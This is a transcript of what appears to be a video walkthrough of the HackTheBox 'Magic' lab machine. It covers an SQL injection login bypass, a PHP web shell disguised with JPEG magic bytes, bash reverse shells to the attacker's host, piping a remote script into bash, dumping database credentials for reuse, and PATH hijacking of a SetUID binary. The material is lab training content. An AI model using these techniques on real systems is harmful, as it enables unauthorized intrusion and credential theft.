What's going on YouTube? This is Ipsec. I'm doing magic from HackTheBox. And before doing this, OXDF gave me the heads up that this one was pretty easy despite being rated a medium and recommended I do it blind. So when doing this box for the first time, I hit the record and acted like I was doing a video, knowing that if it went horribly wrong, I can just cancel the recording, delete the videos, and no one would be the wiser. However, I record these intros after doing it, so I know the video went pretty well, and I also know the general theme of this box is you could find a web page, you can bypass the login through a basic SQL injection, and then you have to abuse some magic bytes to upload a PHP shell to the website. You get a shell on it, and then do a few basic privex things to get root, one of which is a password reuse out of creds of the database, and another one is a SetUID binary that you got to exploit. So with all that being said, let's jump in and do this box. As always, we're going to start with the Nmap, so I'm going to create the directory, put outputs in, then sc for default scripts, sv, enumerate versions, oa, output all formats, put in the Nmap directory we just created, call it magic, and then the IP address, which is 10.10.10.185. I'm also going to put a sudo before Nmap, let that go, and I guess while that runs, we can go take a look at the web page if there is one. So going to 10.10.10.185, it looks like we do have some type of page. I'm not sure what this number on the bottom right is, the 4D whatever. That looks like hex. So let's go to CyberChef and we'll reverse this hex. I'm sure we could do it in like XXD, but this is just the easiest way I know. So that says magic. Okay. The very first thing I want to do, is everything in hex? I don't know what that is. Are these all numbers? Those are hex addresses. Don't know exactly what that is. But what I was saying is this could be a hint that something gets hex encoded later on. So there is a login we can see in the bottom left, but I'm going to do Control U to view the source, and let's see if we see anything too interesting. There is a /images directory, and not too much. So let's look at our Nmap. Only one thing, 2 ports came back. We have SSH and HTTP. It's running Apache and it's a Ubuntu server. So nothing too interesting there. I'm going to do some GoBusters. So let's go into GoBuster, dir-u for URL, HTTP 10.10.10, 185-w for word list. User share word list, dirbuster directory list 2.3 medium, and I think -o is for out file. We'll call this root.txt, and before we run this, we should see if this is a PHP server. So what I'm going to do is go to /index.html. We get nothing there. Index.php, the page comes back. So I'm also going to do -x PHP, and this is going to append the PHP extension to everything. And because I'm doing this, let's do the 2.3 small, because that's going to essentially double the word list, because every entry in directory list, it adds PHP. So let that run. Let's take a look at, okay, let's see. We had /images/full. So /images/full, fulls, plural. So put an S. I'm just seeing if there's any directory listing somewhere. So we also have a second directory /images that we may want. So let's go up and let's do, copy this. The out file, we just want images. This extension, I'm not going to look for PHP scripts in a images directory because that may be silly. Let's do /images. Is that what it is? That is. Run this. So now we got a few GoBusters. And we do see uploads, and we have an upload.php. So let's go take a look at the login form, because I don't really see anything too interesting. We could try to hit upload.php actually. and it puts us over to login.php. So let's try admin, wrong username or password. Let's do admin or password. Okay, admin, and I'm going to do an SQL injection. Looks like I can't use my scroll wheel to zoom in. So let's press F12 and unmask this field, because whatever I put in here is going to show that, so you can't really see what I'm typing. But if I go into the source, take this type equals password off, then it's not going to be masked. So we can do admin, or whenever I hit space, it doesn't go through. Space works. So or 1 equals 1, and we'll probably have to set this go through burp. There's probably some JavaScript or something preventing space from working. Intercept on, log in. So let's see. I'm going to do Control-Shift-U to un-URL encode this. Let's get there. And let's put the spaces we want. So space there, comment. Okay. And I'm going to send this back to the page, turn intercept off. And we log in right away. So that was a super basic SQL injection. Let's see. Let's go back in the history real quick, because we always want to do some type of recon in the background. So let's copy this, copy to file, exec, HTB. Let's see. Magic. Requests. And the file name is going to be login. We can now go and edit this. So vrex login. And whenever you do something through SQLMap, I think you either want to put 2 stars where you want to inject maybe, or just not put a basic injection. So I'm just going to put password is equal to please subscribe. We can show you what happens real quick. SQLMap -r rex login, and I thought it would complain. But anyways, you want vanilla fields in this. It may not be complaining because I don't have the comment at the end. So that -- batch. Okay. So now we can take a look at this login form. So upload file. I'm going to press Control L, which puts me in this location bar, so I can just type home exec HTB magic. And let's make some stuff to upload. This came back and let's see, -- tamper equals space to comment. Try a tamper script. We know this is injectable. I'm not sure why SQLMap did not find it. So let's make dir uploads the shell.php. And I don't actually php-a. I don't know which one I want to do. So if we do exec, who am I? We have to do echo with that one. System, who am I? Let's do system. I always get the PHP syntax confused because there's like 3 or 4 ways to execute code. System, who am I? Actually, let's just do system. We'll jump a step. Requests, exec. We'll put this please subscribe. Okay, so now whenever we hit this, we should be able to go to shell and echo. Thanks for the sub. So I put an echo statement first, so we know we actually hit the script. Okay. So now we can try to upload this. So let's go to uploads, shell.php, and I'm going to intercept on, upload image. Send this to repeater because I want to see exactly what this says. Alert, sorry, only JPEG and PNG files are allowed. So we can try changing the MIME type. So let's go and do file. I don't know exactly what the MIME type is off the top of my head. So MIME types JPEG. And let's turn burp off. Image/JPEG. That's easy enough. Not the same. Okay. Content type image JPEG. Okay. Let's do shell.jpg. What are you trying to do there? So when I did this .jpg, we got a new alert. It says, what are you doing there? So that's the field I'm playing with now. So I'm going to try jpeg.php, and it doesn't do that. So that only appears if we end this with JPEG. If this MIME type is not image JPEG, still happens. JPG. Okay. So it may be going off the magic bytes of the file now. So let's do locate JPG, and we can grab the magic bytes of this JPEG. So magic bytes are the first few bytes of a file. I'm going to do head that, pipe it to xxd. And here would be like the magic bytes. So I'm probably going to go to this null byte. So that would be, I don't know, this is 10, maybe 16. So let's try head. And then head also has the option for bytes. So C. So I'm going to do head -C16. And we can do a little bit more. 20. That looks good. So if I do this and put this to a file and file this, it still says it's a JPEG because we have those magic bytes. So that's all I was trying to do. So let's copy test to uploads. Oh, I'm in uploads. So let's just rename test to JPEG magic bytes. And then we can just cat these two files together. So if we cat JPEG magic bytes, shell.php to magical shell.php, and we do a file against this, it shows it as a JPEG. So long way to do what I was just trying to show you. It's always easiest now to just go back and re-upload a file. So upload magical shell, and we're probably gonna have to rename this to be JPEG. Let's see, there, upload magical shell, intercept, upload. So we can see the magic bytes here. I'm going to send this over to repeater again. Close these off. Click send. And we get that error message. We wanted to put .jpeg on the end of this. Well, we did JPG. Doesn't really matter. And it's been uploaded. So the field's not caring about this MIME type whatsoever. It's only caring about it ends with JPG and has this beginning part of the magic bytes. So now we have to figure out exactly where this file exists on the server. So we can go back over to a GoBuster, and we see there is a /uploads directory, and this was in images. So let's go to, I'm just going to go and burp and turn intercept off. Go back here, /images/uploads. And it was magical shell.jpg or JPG. .php.jpg. Okay, so we know exactly where this file is. We have to find a way to get code execution because you can't really get code execution just based upon it ending with this. It should end with .php. So, oh God. What can we do? Let's go back here. Looking at this, I don't see any field that could have an LFI. Let's see. We could try fuzzing index.php for hidden functions. So let's do. Now let's go back to our SQLMap. Nothing. --risk equals 3 --level equals 5. Try this one. It may not like it being blind. Maybe in the end of the video we'll go back and look at. So I want to fuzz index.php, wfuzz -u http 10.10.10 185 index.php fuzz equals we'll do index and -w opt seclist discovery web content. Let's see. Directory. We can just try comment, I think. Maybe one in API. API actions.txt. Okay, and we probably want to --hl to hide length 59. --h lowercase l. And we don't get anything. Let's see. Common. I guess while that goes, we can try the silly thing. Let's just try please subscribe is equal to who am I? And the shell got deleted off the server. So it doesn't last forever. Upload, go. Oh, we do have code execution. Why do we have code execution? Okay. When you get it, don't complain. There are things that you always just try because configurations can be silly, especially in CTFs. So let's go back to uploads. Look at my shell. PLEAS. Oh, I did requests. That should be a request. So shell.php. I was thinking maybe Python request module with the S, but let's see. Let's do cat JPEG magic bytes shell.php to magical shell.php. Got the magic bytes, and we should be good. So let's re-upload this. Actually, we didn't even have to edit the file. Go back to the request, do that, and then refresh, and now we got data here. So let's go and intercept this request, do it in burp. So proxy intercept on. The hell? Get rid of. Why are you not intercepting? History. It's going through burp. Oh, let's go to options. And where is it? File extension. Okay. So file extension does not match an image. We're not going to intercept it by default. Let's undo that. Refresh. And here we go. So send this to the repeater tab. I'm going to change this request method to a post because we use the, in the shell, because we used request, it works with either post or get. And I like doing post just because there's less bad characters. So it's much easier to work with. So we have the www data right here. We could, if we wanted to, probably put a \n here in the echo message. And now when we go here, it puts a command on a new line for a little housekeeping. But let's do a reverse shell. So --c --i dev tcp 10.10.14. My IP is .2 and port 9001, 0 and 1 like that. And then let's go and press Control-U to URL encode. And I'm going to try to do better documentation or just stuff when I do my reverse shells in these videos. So now we got this. I'm going to do script, and we're going to call this web shell and put the date. I'll just do web shell.log. So now anything I do in this pane until I type exit will go to this file web-shell.log. So you could also do this within tmux and do tmux logging. It's a plugin, but sometimes it's better just to do it this way. So nclvnp 9001. Go here, send, file's not there, go back, upload file, reverse shell, and we are here. So what I was meaning by that, if we exit this and then do exit again and cat the webshell.log, we can see everything there. So I'm going to do script webshell.log again to start it back up, and we'll do this to get a shell. Wait, what? Why is that not getting me a shell? That is bizarre. 9002. Who am I? Let's see. Please subscribe is equal to who am I? You know when you try to do something to explain it and then the demo gods do something that throws a huge wrench? That kind of just happened. Let's see. System request. Let's just name this run me. It's no longer executing code. Huh. I have no idea what I just did there. Let's call magical shell 2.jpg. Change this to an exec call. Let's put another line break to make sure we're editing the file. Goes to 10. Just doesn't want to execute any code. Probably going to revert the box. Yeah, let's revert the box. I'm not sure what I just did there, but obviously something not good. So, gonna pause the video, revert the box, and then we'll resume. Actually, I haven't reverted the box yet. I was about to, and I noticed something weird here. So, maybe this content type is screwed up, and that's what we have to do. So, I think it's just supposed to be URL form URL encoded, and when I was typing exit, I started typing here. And that was it. So, always make sure your content type matches what you want to do. So, we can buy Control-Z a bunch to get to where the reverse shell was. Bash, there we go. And yep, we have this. So let's clean that out. We can go back to port 9001, and let's do exit to clean up our script. Run it, and see LVNP 9001. File not found. We can just put that file back. And we wanted to call it please subscribe. There, run, go to the next tab, run, got a shell, and we're back to where we were. So the very first thing I want to do is get a regular TTY, so python-c, import pty, pty.spawn, bin bash. We got to do Python 3. So, which Python 3, it does exist. Then Control-Z, stty raw minus echo, type fg, enter, enter, and you get to where we should be. I'm also going to do export term is equal to xterm. So now I can clear the screen. So let's take a look at this box. We have a few files. There is hey.jpg. Let's try checking that out. So images. And we can do hey.jpg. Just a fun meme. We got bg.jpg, and that's probably the background of the website. Let's see. Upload, images, assets. Doesn't really look too interesting there. CatDB PHP 5. We can grab these creds. So v creds.txt. There we go. Let's see. I guess we should just run learn enum or something. So make dir dub cp. I don't know what happened to my cursor. Cp opt. Is it privilege escalation awesome script suite? And we want to do linpeas to my directory. Python-m http server. Python 3. curl 10.10.14.2 port 8000 linpeas.sh bash. Curl's not there. I'm going to try wget-o-. I think that may be how you do to standard out. I think I saw someone comment in a video, and I actually remembered it this time. That may not be it. Let's see. Let's just Google it. wget to std out. -o std out? No. -L. There we go. So if we do that, pipe it over to bash, it works just like with our curl. So we don't drop it to the disk, and we still get code execution. So let's just go to the top and look at it while it runs. Nothing too interesting. We already knew it was Ubuntu. File system, nothing too interesting there. I guess we do have GNOME installed, so it looks like it has a desktop environment. Bit odd for a server. ASLR is enabled, nothing too interesting. Software. Let's see. GSD. Oh. I wonder why that's highlighting the screen part. Maybe because it assumes screen is vulnerable if it's like running in a process. I'm not sure why that thinks that's exploitable. I don't think it is. What was that? RT kit. Oh, that's not it. For some reason, looking at it, it looked like rootkit. I don't know what whoopsie is. Let's see. Whoopsie bin. So, looks like this is a standard thing. Going down. Cron jobs, nothing too interesting. Again, I'm just glancing at whatever the colors are. I'm going to copy this. Because I'm in edit mode, it's not displaying as to standard out anymore. So once I hit Control-C to exit standard edit mode, everything gets pasted, and I'm just going to search back up to analyzing service files. Let's see. We have this PHP session clean. And I believe this could be probably just cleaning PHP session IDs. It could also be the task that the creator did to create clean images. So we should probably take a look at that. Let's see. But we probably don't have permission yet to take a look at that. Processes. Can I sniff with TCP dump? No. Root. We do have a user, theseus, but we're www data. Interesting that MySQL is not found, but we do have MySQL running because we saw port 3306. Let's see. That's not private SSH keys. Interesting file. So these are SetUID files. So let's see. Anything I don't recognize? There's a lot of SetUID files on this box. And maybe because it's running as the desktop. Let's see. Set GID. Probably going to go and redo a SetUID check and look at file dates and sort them that way because there's just way too many things here. Nothing there. Writable folders. Don't really see anything. Find slash, let's do dash perm 4000 dev null. Okay, let's do dash ls. And I'm going to grep dash v 201. I might just do 201. And we still need that dev null. And we probably should fix our TTY because we're doing a weird line wrapping thing. So let's go back here, STTY-A, and we want to set columns to 136. So STTY columns 136. And let's do rows 32. There we go. So let's see. We want to put this grep on the other side of dev null, I think. 201. Okay. Here's all the SetUID files from right now, or this year. And doesn't look like any are too interesting. There was a 2018 one, which makes it pretty old. So we may want to take a look at that. That is a probably old version of sudo. Sudo-v -- version. Maybe it's not. I don't know. MD5 sum. Go here. And then we can take this MD5 VirusTotal.com. Search. Put the MD5 here. And let's see, does this have a first seen? Last seen 27 days ago. Or maybe that's first seen 27 days ago. Details. First seen in the wild 2017. So chances are this pseudo binary is old because it was first seen around the time of our timestamp. So definitely interesting, but can't really exploit it because we can't even execute sudo. We can't really do too much because our user doesn't have permission. Let's see. Let's figure out exactly why we could execute code. So that's generally done in htaccess files, telling it how PHP accesses. So let's look at this. And nothing too interesting there. But if you're curious why we could execute with the JPEG extension, it's because of this. If file match PHP any number, set handler to application X httpd-php. So when it gets to the Apache web server, it has this MIME type on it, even though it's a JPEG. And when it has this MIME type, it gets sent over to be executed by PHP. So if we go etc apache2 grep-r on that MIME type, we can see mod enabled PHP. And if this handler is there, then it executes. So I bet if we went back here and changed this to be magicalshell.jpg, and then magicalshell.jpg, and we change this just to be who am I, it doesn't work because it doesn't get sent to PHP. You need PHP in that file name. So we got kind of lucky there that we just appended it. A little laziness there saved me troubleshooting that. But that's what I'd expect. But that htaccess file changed it. Websites also have MySQL. So MySQL-u theseus dash, I think capital D, and database name is magic. We don't have the MySQL client. MsqlDump magic-u theseus-p. Enter the password. Cat creds. I am King Theseus. Copy, paste. And now we dumped the database. So it looks like there's only one table in this magic, and that is logon. And the password is Theseus was king. Copy. And I had a notification go in the background. Hopefully you guys couldn't hear that sound. Let's see. What was I doing? Oh, b.creds database. We'll do admin like that. And let's cat creds. And there is the user theseus in this box. So let's do su-theseus and try both these passwords. Authentication failure. Try the other one. Sweet. So lsla.ssh. I'm going to just SSH into the box to get a cleaner shell. So sh-keygen-f theseus. Hit enter a few times. theseus.pub. Copy. Echo to authorized keys. Okay. chmod 600 theseus ssh-i theseus at 10.10.10 181. I think it's 185 actually. Yes. Sweet. So now I'm going to go into shells and script theseus-sh.log. And we'll just do that again. Copy this command, paste. There we go. And let's exit all this. And I'm going to type, oh, I don't have to. Sweet. There we go. So now we're SSH'd in. Sudo-l. We have his password. So cat creds. Let's try this. Theseus may not run sudo. Let's, I guess, run winps again, or linps. cd dub python-m, or python 3, http server. I'm going to grep wget out of shells. We do web shell. And we can just copy this. Type it bash. And let this run. Looks like it's taking longer to run as this user. Maybe not. Still analyzing service files. So I'm going to pause the video. We'll let this finish and then go over it. linps has finished. So let's just go and look at everything. Going up. Don't really see anything highlighted in red and yellow. And yeah, doesn't look too interesting. So let's do a few find commands. So I'm going to do find /-user theseus to dev null. And this will be finding files this guy owns. I'm also going to add the -ls so we can see permissions. So here's a bunch of stuff in local. Evolution, that's a mail client, so we may want to take a look at that, but I don't know if I see any files there. We could potentially get a password, but we know his password. So I'm going to guess that's just created because of reasons. Man, that directory is noisy. We got VMware and cache. Proc. Let's see. Let's do, what groups am I? Users. Let's do dash group users. Oh, that's unique. We can see that has the probably SetUID permission. I think that just means special. I'm not sure. Let's see. That is definitely SetUID. So, where is this? Why didn't we see this before? Bin sysinfo. I guess because we couldn't execute it, only the people of users can execute it. At least I don't think we saw that before. Thankfully, we do a good job at taking notes, and we can just do grep sysinfo. We did see it. Did that elude us? Less shells web shell. Sysinfo. Yeah. We just completely missed it. So it was there, but it just blended in with the noise. But thankfully, doing these other find commands, looking at what's special with our user, we could see it easily. So let's do, I guess, just execute it. And it gets a few things. Let's do strace, sysinfo, and let's see. Strace is like syscall trace, so it's going to print all the syscalls it made. So we can see it writing sysinfo, creating a pipe. I think this is forking right here, and then getting output. So I wonder if systrace, does it have a follow fork? Or strace, my bad. Dash F. So now, let's see, mem usage. This isn't exactly where we were, but we can see now more output. Trying to figure out exactly where we were before. Oh, right here. So we saw this. This looks like it's catting probably cpu.info. Okay. AMD. There we go. So we can see how it gets this. So we see this PID. This is it doing the fork. Come on. Okay, CPU info. Dupe2, exec, bash, and now it's doing cat, proc CPU info. So it's not using absolute paths. So there's probably other ones. So we can probably just search for exec VE. So it's doing an absolute path on free right here. So we can't hijack that. It's not doing an absolute path on this one though. When it executes bin bash and then free. Doing an absolute path, but then not there. No absolute path there. Absolute path, but nothing there. So let's try abusing this. So I wonder if I can just do this and then grep exec v. Nope. Let's see, 2 to 1. Nope. Let's see. I think -ff put it in files. Right? Make dir temp, cd temp. strace. Follow fork with output into separate files. Do we have to give it a file name? Okay, I'm not sure exactly how to do that one, but let's play with a few of these. So we can do exec ve, and we can try free first. So what I'm going to do is vi free, then bash, and let's do a reverse shell. So bash-c, bash-i, dev tcp 10.10.14.2, 9001, 0 at 1. I think that's how I did the shell. Shoot. It was an and. Like that. Okay. chmod plus x free. And we probably got to put the... Oh, we did. The shebang at the very top. So let's see. We can exit this. And see lvnp 9001. And if we just execute, what was it? sysinfo, nothing happens. However, because it just calls free like this, and how that works is based upon the path. So if I echo path, I can do export path is equal to pwd path. Maybe I have to do that. Echo path. Uh-oh. Well, I just screwed up the path. So we can do export path is equal to pwd, then that. So now my current directory is at the very top of my path. So when something calls free, it should have went to this. Weird. Which free, user bin free. Echo path. Oh, I have a semicolon. Come on. It's a colon, not semicolon. There we go. So now when I call free, it executes the free out of my shell. So if we do, or I guess we should go here and do script root shell.log nclvnp 9001 sysinfo. When it hits this free command, we get a shell. So we go into /root and we can see the program. So it's doing cout exec free.h. So you can see everything here. So we should be able to probably exploit fdisk, cat, or lshw. So we can try that real quick. Exit. So if we move free to be cat, sysinfo, got a shell there. We can move cat to be, what was the other one? fdisk. And then execute sysinfo. We get it. But before we go, let's take a look at the SQL map I did a while ago. I can't find exactly what pane we did it on, It was probably on pane 1 somewhere. Maybe like I was going through the history typing SQLMap, but I don't remember doing the -- dump all, and it went like that on all the panes. So I'm just going to run it again on this pane, and we'll see it has identified that the parameter username is a Boolean-based blind injection. So here you could just do -- dump all, and it'll take a while, but it will eventually dump everything. We probably should do -- batch probably, and see if it does. And we see it's slowly but surely retrieving data. We could speed it up by telling it to do, I think, -- dump magic. Would that be the database? Let's see, man SQLMap, search for database. That's not it. That's not it. -- current DB. So we'll do -- dump current DB, and this database current -db. This database shouldn't have that much data. I need to stop talking and typing. Just hit enter on those, and we're going to see it slowly start dumping data. So one table, the table is called login, and the user was something like, I think, admin, and the password was something with like King Theseus or something. But this is how you do it with SQLMap. Hope you guys enjoyed the video. Take care, and I will see you all next week.